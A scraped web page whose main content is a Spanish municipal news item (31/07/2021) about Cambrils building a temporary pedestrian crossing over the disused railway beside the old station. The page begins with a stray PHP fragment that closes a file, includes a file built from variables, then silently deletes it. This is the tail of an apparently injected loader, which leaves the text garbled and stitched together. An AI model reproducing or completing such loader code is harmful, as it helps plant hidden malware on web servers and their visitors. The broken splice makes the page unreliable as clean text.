");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Cambrils habilita un paso provisional de peatones para cruzar la vía del tren junto a la antigua estación
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

Cambrils habilita un paso provisional de peatones para cruzar la vía del tren junto a la antigua estación (31/07/2021)

El Ayuntamiento de Cambrils, desde el Departamento de Obra Pública, ha iniciado la habilitación de un paso provisional para peatones para cruzar la antigua vía del tren entre la Avenida Vidal i Barraquer y la Avenida Horta de Santa María , al lado del edificio de la antigua estación. De este modo se facilita la conectividad entre dos barrios residenciales densamente poblados.

La actuación en la Avenida Vidal i Barraquer y la Avenida Horta de Santa María es provisional, pendiente de que se retire la infraestructura y urbanice de nuevo este ámbito en todo el trazado por el municipio. La infraestructura ferroviaria está desafectada pero supone una barrera física muy importante para el municipio hasta que no se desmantele.

Los trabajos, que han sido adjudicados a la empresa Obras y Hormigones Blanco, consisten en acondicionar un tramo perpendicular a la dirección de los antiguos carriles de circulación del tren para hacer posible la movilidad de los peatones del Ensanche pueblo en la zona de Horta de Santa María y del Puerto. Se prevé la construcción de un paso pavimentado a base de una losa de hormigón y ampliar la anchura de una pequeña rampa existente que da la avenida Vidal i Barraquer, de acuerdo con la normativa de accesibilidad.

La actuación cuenta con la preceptiva autorización de ADIF, el administrador de la infraestructura, y las obras tienen en cuenta algunas condiciones especiales, como facilitar la circulación de trenes de trabajo y garantizar la protección de los elementos existentes.

Es el primero de los pasos provisionales en la antigua vía en desuso para empezar a eliminar barreras arquitectónicas mientras no llegue el desmantelamiento del actual trazado y se haga realidad el proyecto del nuevo tren-tranvía. Los otros pasos previstos se situarán en la avenida Juan XXIII (urbanización Cambrils Badia), el camino del Corralet, la calle de Estrasburgo, Mas Clariana, y entre los paseos Francesc Macià y Lluís Companys.

Fuente: Ayuntamiento de Cambrils

Cambrils habilita un paso provisional de peatones para cruzar la vía del tren junto a la antigua estación

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona